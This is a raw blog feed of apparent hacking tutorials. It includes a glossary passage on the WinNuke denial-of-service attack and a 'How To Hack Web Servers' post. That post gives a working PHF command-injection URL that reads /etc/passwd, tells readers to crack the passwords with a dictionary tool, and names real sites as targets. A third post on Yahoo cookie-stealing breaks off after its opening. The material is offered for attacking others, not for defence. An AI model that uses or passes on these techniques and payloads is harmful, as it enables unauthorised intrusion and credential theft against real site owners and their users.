&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
9. DoS - Denial of Service. A nuke in dummies language. Some kind of an 
attack that causes the target computer to deny some/all kinds of 
services to the users of that computer (including remote users).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
For example: Winnuke (also known as OOB), the simplest DoS in the world.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
(Taken from Spikeman&#39;s DoS site) This denial of service program affects 
Windows clients by sending an &quot;Out of Band&quot; exception message to port 
139, which does not know how to handle it. This is a standard listening 
port on Windows operating systems. Users of Win 3.11, Win95, and&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Win NT are vulnerable to this attack. This program is basically a 
nuisance program, but it is being widely circulated over the internet 
now. It has become a bother in chatrooms and on IRC. By using your IP# 
and sending OOB data to port 139, malicious users can disconnect you 
from&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
the net, often leaving you with low resources and the blue tinted 
screen. Some of you may have been victims already. If this happens to 
you on Win 95, you will see a Windows fatal error message similar to the
 following:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
This was called from 0028: in VxD NDIS(01) + 00000D7C.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Rebooting the comp should return it to normal state.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Patches (&quot;fixes&quot;) For WinNuke (OOB)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
-=-=-=-=-=-=-=-=-=-=-=-&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Additional Information on WinNuke&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a class=&quot;linkification-ext&quot; href=&quot;http://support.microsoft.com/support/kb/articles/Q168/7/47.asp&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://support.microsoft.com/support/kb/articles/Q168/7/47.asp&quot;&gt;http://support.microsoft.com/support/kb/articles/Q168/7/47.asp&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Windows 95 Patches&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a class=&quot;linkification-ext&quot; href=&quot;http://support.microsoft.com/download/support/mslfiles/Vipup11.exe&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://support.microsoft.com/download/support/mslfiles/Vipup11.exe&quot;&gt;http://support.microsoft.com/download/support/mslfiles/Vipup11.exe&lt;/a&gt;&lt;br /&gt;
&lt;a class=&quot;linkification-ext&quot; href=&quot;http://support.microsoft.com/download/support/mslfiles/Vipup20.exe&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://support.microsoft.com/download/support/mslfiles/Vipup20.exe&quot;&gt;http://support.microsoft.com/download/support/mslfiles/Vipup20.exe&lt;/a&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt; (for Winsock 2.0*)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.theargon.com/defense/nuke/index.html&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.theargon.com/defense/nuke/index.html&quot;&gt;http://www.theargon.com/defense/nuke/index.html&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Please read notes referring to 95 patches before installing.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Which version of Winsock do you have on your Windows 95 PC?&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a class=&quot;linkification-ext&quot; href=&quot;http://premium.microsoft.com/support/kb/articles/Q177/7/19.asp&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://premium.microsoft.com/support/kb/articles/Q177/7/19.asp&quot;&gt;http://premium.microsoft.com/support/kb/articles/Q177/7/19.asp&lt;/a&gt;&lt;br /&gt;
&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.theargon.com/defense/nuke/index.html&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.theargon.com/defense/nuke/index.html&quot;&gt;http://www.theargon.com/defense/nuke/index.html&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Windows NT 4.0 Patch&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a class=&quot;linkification-ext&quot; href=&quot;http://support.microsoft.com/support/kb/articles/Q143/4/78.asp&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://support.microsoft.com/support/kb/articles/Q143/4/78.asp&quot;&gt;http://support.microsoft.com/support/kb/articles/Q143/4/78.asp&lt;/a&gt;&lt;br /&gt;
&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.theargon.com/defense/nuke/index.html&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.theargon.com/defense/nuke/index.html&quot;&gt;http://www.theargon.com/defense/nuke/index.html&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Please read notes referring to Windows NT patches before installing.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
More info on DoS attacks can be found at Spikeman&#39;s DoS site: &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.genocide2600.com/~spikeman/main.html&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.genocide2600.com/~spikeman/main.html&quot;&gt;http://www.genocide2600.com/~spikeman/main.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
* I do not know it it will work on newer versions of Winsock, so you&#39;d 
better downgrade to Winsock 1.1 (the version that comes with Windows 95)
 by going to Control Panel, Network and removing TCP/IP and Dial Up 
Adapter(11) and then readding them (click add, choose protocol and in 
the company frame choose Microsoft and you&#39;ll find TCP/IP. For DUN do 
the same but choose adapter instead of protocol).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
After you finish downgrading reupgrade to Winsock 2.0, apply the patch 
(Vipup20.exe) and then upgrade to newer versions of Winsock.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
10. Flames - the action of flaming someone (send him angry mail about 
things he has done, opinions he has etc&#39; which you do not agree with).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
11. DUN - Dial Up Adapter. Basically it&#39;s the Windows program that dials to your ISP(12).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
12. ISP - Internet Service Provider. A company that provides Internet 
services, such as Internet connectivity, web hosting, Email services 
etc&#39;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
13. Distro - Distribution. Since UNIX is not a registered patent, 
trademark, copyrighted or whatever there are many distributions 
(software packages) of it. Every distro has it&#39;s own advantages and 
disadvantages (example: Redhat is the best for beginners).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Next Tutorials&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
--------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
The next tutorial will be about Sendmail, the buggiest daemon on earth -
 what is Sendmail, Sendmail commands, how to hack through Sendmail, how 
to send completely untracable mail, a newbies corner (what is a daemon, 
how to trace mail etc&#39;) and much much more.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
If this tutorial scores 7 points out of 10, then the Sendmail tutorial 
with score 12. First of all, it&#39;s gonna be veery looong and it&#39;ll have 
lots of side tips and thorough explanations about security holes and 
tips and tricks and tons of cool stuff I havn&#39;t thought of yet.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Besides, I did this tutorial in a rush &#39;cause I didn&#39;t have much time to
 work on it*, but summer vacation is coming up so I&#39;ll have plenty of 
time to work on the Sendmail tutorial.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
The 3rd tutorial will be probably about UNIX Shell Programming. I don&#39;t 
wanna give away any details right now, and besides - I&#39;m not so sure 
about this title. Maybe I&#39;ll change it to an &quot;All you wanted to know 
about IRC wars and never had the guts to ask&quot; tutorial. Who knows.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
I&#39;ll set up a electronic poll soon so you&#39;ll be able to vote on that 
subject or suggest other titles (subscribe to the mailing list and 
you&#39;ll be notified when it&#39;s ready. To subscribe, go to blacksun.box.sk 
and go to the Mailing List page).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
For more information, head down to blacksun.box.sk. Don&#39;t forget to drop us a line!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
* Just installed Redhat 6.0. Yeah, yeah, I know, it&#39;s not exactly the 
best Linux distro(10) out there (I&#39;m trying not to offend all of you 
Redhat users out there), but I wanted to see how it looks and 
everything.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
I gotta tell you, the installation is EEE-ZZZ comparing to other distros, and it&#39;s great for beginners.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Note: before I&#39;ll release the Sendmail tutorial I will send out some 
mini-tutorials, such as &quot;Buffer Overflows&quot;, &quot;Overclocking&quot;, &quot;RM 
Networks&quot; etc&#39;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Other Tutorials&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
---------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Overclocking.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
RM Networks Hacking.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Ad and Spam Blocking.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Sendmail (creating fake mails and hacking servers that run Sendmail).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Get them all at blacksun.box.sk, or join the mailing list at blacksunresearch.listbot.com.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Bibliography&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
BugTraq Archives - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.securityfocus.com/level2/bottom.html?go=search&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.securityfocus.com/level2/bottom.html?go=search&quot;&gt;http://www.securityfocus.com/level2/bottom.html?go=search&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
RootShell - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.rootshell.com/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.rootshell.com&quot;&gt;http://www.rootshell.com&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Fyodor&#39;s Exploit World - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.insecure.org/sploits.html&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.insecure.org/sploits.html&quot;&gt;http://www.insecure.org/sploits.html&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Packet Storm - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://packetstorm.harvard.edu/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://packetstorm.harvard.edu&quot;&gt;http://packetstorm.harvard.edu&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
X-Force Search (simplest) - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.iss.net/cgi-bin/xforce/xforce_index.pl&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.iss.net/cgi-bin/xforce/xforce_index.pl&quot;&gt;http://www.iss.net/cgi-bin/xforce/xforce_index.pl&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Slashdot - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.slashdot.org/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.slashdot.org&quot;&gt;http://www.slashdot.org&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Spikeman&#39;s Denial Of Service Website - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.genocide2600.com/~spikeman/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.genocide2600.com/~spikeman/&quot;&gt;http://www.genocide2600.com/~spikeman/&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
PC Magazine - &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.pcmagazine.com/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.pcmagazine.com&quot;&gt;http://www.pcmagazine.com&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/1696556758565509685/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/the-ftp-tutorial.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/1696556758565509685'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/1696556758565509685'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/the-ftp-tutorial.html' title='The FTP Tutorial'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-9040666594170902305</id><published>2013-01-05T05:45:00.002-08:00</published><updated>2013-07-28T02:06:57.681-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hack a website"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking web servers"/><category scheme="http://www.blogger.com/atom/ns#" term="how to hack website"/><category scheme="http://www.blogger.com/atom/ns#" term="website hacks"/><title type='text'>How To Hack Web Servers</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #595543; font-family: Arial, verdana, Tahoma, &#39;Century gothic&#39;, sans-serif; font-size: 13px; line-height: 19px;&quot;&gt;In my previous posts i will tell about some basics of &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/the-ftp-tutorial.html&quot;&gt;File Transfer Protocol (FTP)&lt;/a&gt; and also some &lt;a href=&quot;http://hackerx-malik.blogspot.com/search/label/Network%20Hacks&quot;&gt;networks hacks&lt;/a&gt;. Previously i also write how to &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/hack-website-using-remote-file-inclusion.html&quot;&gt;hack a website using Remote File Inclusion (RFI)&lt;/a&gt; but today i will explained how to hack a website using web server it is different from previous one. I am asked at least 5 or more times a day by young, beginning&lt;br /&gt;
&quot;hackers&quot;,&amp;nbsp;&amp;nbsp; &quot;How can I hack?&quot; or &quot;Is there a way to hack a web site?&quot;&lt;br /&gt;
Well there is. There are, in fact, literally hundreds of ways to do this. I&lt;br /&gt;
will discuss a few in this text to get you started. Every hacker has to start&lt;br /&gt;
somehow and hacking web servers and ftp servers is one of the easiest ways.&lt;br /&gt;
If you are reading this I am assuming that you already have a basic knowledge&lt;br /&gt;
of how web servers work and how to use some form of UNIX. But I am going to&lt;br /&gt;
explain that stuff anyway for those of you who don&#39;t know.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Part 1: Simple UNIX Commands&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Most DOS commands have UNIX and Linux equivalents. Listed below are&lt;br /&gt;
some of the main commands you will need to know to use a shell account.&lt;br /&gt;
&lt;br /&gt;
HELP = HELP&lt;br /&gt;
COPY = CP&lt;br /&gt;
MOVE = MV&lt;br /&gt;
DIR = LS&lt;br /&gt;
DEL = RM&lt;br /&gt;
CD = CD&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; To see who else is on the system you can type WHO. To get information&lt;br /&gt;
about a specific user on the system type FINGER &lt;username&gt;. Using those basic&lt;br /&gt;
UNIX commands you can learn all you need to know about the system you are&lt;br /&gt;
using.&lt;br /&gt;
&lt;br /&gt;
Part 2: Cracking Passwords&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; On UNIX systems the file that contains the passwords for all the users&lt;br /&gt;
on the system is located in the /etc directory. The filename is passwd. I bet&lt;br /&gt;
your thinking....&quot;Great. All I have to do is get the file called /etc/passwd&lt;br /&gt;
and I&#39;ll be a hacker.&quot; If that is what you are thinking then you are dead&lt;br /&gt;
wrong. All the accounts in the passwd file have encrypted passwords. These&lt;br /&gt;
passwords are one-way encrypted which means that there is no way to decrypt&lt;br /&gt;
them. However, there are programs that can be used to obtain passwords from&lt;br /&gt;
the file. The name of the program that I have found to be the best password&lt;br /&gt;
cracker is called &quot;Cracker Jack.&quot; This program uses a dictionary file composed&lt;br /&gt;
of thousands of words. It compares the encrypted forms of the words in the&lt;br /&gt;
list to the encrypted passwords in the passwd file and it notifies you when&lt;br /&gt;
it finds a match. Cracker Jack can be found at my web site which is at&lt;br /&gt;
&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.geocities.com/SiliconValley/9185&quot; title=&quot;Linkification: http://www.geocities.com/SiliconValley/9185&quot;&gt;http://www.geocities.com/SiliconValley/9185&lt;/a&gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Some wordlists can be found at the following ftp site: &lt;a class=&quot;linkification-ext&quot; href=&quot;http://sable.ox.ac.uk/&quot; title=&quot;Linkification: http://sable.ox.ac.uk/&quot;&gt;sable.ox.ac.uk/&lt;/a&gt;&lt;br /&gt;
pub/wordlists. To get to the wordlist that I usually use goto that ftp site&lt;br /&gt;
then goto the American directory. Once you are there download the file called&lt;br /&gt;
dic-0294.tar.Z which is about 4 MB. To use that file it must be uncompressed&lt;br /&gt;
using a program like Gzip for DOS or Winzip for Windows. After uncompressing&lt;br /&gt;
the file it should be a text file around 8 MB and it is best to put it in the&lt;br /&gt;
same directory as your cracking program. To find out how to use Cracker Jack&lt;br /&gt;
just read the documentation that is included with it.&lt;br /&gt;
&lt;br /&gt;
Part 3: The Hard Part (Finding Password Files)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Up till now I have been telling you the easy parts of hacking a&lt;br /&gt;
server. Now we get to the more difficult part. It&#39;s common sense. If the&lt;br /&gt;
system administrator has a file that has passwords for everyone on his or her&lt;br /&gt;
system they are not going to just give it to you. You have to have a way to&lt;br /&gt;
retrieve the /etc/passwd file without logging into the system. There are 2&lt;br /&gt;
simple ways that this can sometimes be accomplished. Often the /etc directory&lt;br /&gt;
is not blocked from FTP. To get the passwd file this way try using an FTP&lt;br /&gt;
client to access the site anonymously then check the /etc directory to see if&lt;br /&gt;
access to the passwd file is restricted. If it is not restricted then download&lt;br /&gt;
the file and run Cracker Jack on it. If it is restricted then try plan B. On&lt;br /&gt;
some systems there is a file called PHF in the /cgi-bin directory. If there&lt;br /&gt;
is then you are in luck. PHF allows users to gain remote access to files&lt;br /&gt;
(including the /etc/passwd file) over the world wide web. To try this method&lt;br /&gt;
goto your web browser and type in this URL:&lt;br /&gt;
&lt;a class=&quot;linkification-ext&quot; href=&quot;http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd&quot; title=&quot;Linkification: http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd&quot;&gt;http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd&lt;/a&gt;&lt;br /&gt;
Then substitute the site you are trying to hack for the xxx.xxx.xxx.&lt;br /&gt;
For example, if I wanted to hack St. Louis University (and I have already) I&lt;br /&gt;
would type in &lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd&quot; title=&quot;Linkification: http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd&quot;&gt;http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Don&#39;t bother trying &lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.slu.edu/&quot; title=&quot;Linkification: http://www.slu.edu&quot;&gt;www.slu.edu&lt;/a&gt; because I have already done it and told them&lt;br /&gt;
about their security flaw.&lt;br /&gt;
Here&#39;s a hint: try &lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.spawn.com/&quot; title=&quot;Linkification: http://www.spawn.com&quot;&gt;www.spawn.com&lt;/a&gt; and &lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.garply.com/&quot; title=&quot;Linkification: http://www.garply.com&quot;&gt;www.garply.com&lt;/a&gt;&lt;/username&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/9040666594170902305/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/hacking-servers.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/9040666594170902305'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/9040666594170902305'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/hacking-servers.html' title='How To Hack Web Servers'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-898875900251533740</id><published>2013-01-05T05:39:00.001-08:00</published><updated>2013-07-28T03:02:58.261-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cookies Stealing"/><category scheme="http://www.blogger.com/atom/ns#" term="email account hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking email account"/><category scheme="http://www.blogger.com/atom/ns#" term="yahoo account hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="yahoo mail hacking"/><title type='text'>Yahoo Account Hacking / Hack yahoo Account by Cookies stealing to browser / Session Hijacking</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
In my previous i write about &lt;a href=&quot;http://hackerx-malik.blogspot.com/2012/10/the-hacking-truths-manual_8.html&quot;&gt;hacking truths manual (Ebook)&lt;/a&gt;&amp;nbsp;in which a complete guide about how to hack any email account and in an other post i explained how to &lt;a href=&quot;http://hackerx-malik.blogspot.com/2012/10/how-to-find-ip-address-of-email-sender.html&quot;&gt;get ip address email sender using his mail&lt;/a&gt;. Also i have write details of &lt;a href=&quot;http://hackerx-malik.blogspot.com/2012/10/easy-hacking-tutorials-and-tools-must_8.html&quot;&gt;hacking tutorials and tools&lt;/a&gt; in a post. Today i will explain about how to hack yahoo account using cookies very rare and effective method.&lt;br /&gt;
&lt;div class=&quot;post-body entry-content&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; padding-top: 8px; text-align: justify;&quot;&gt;
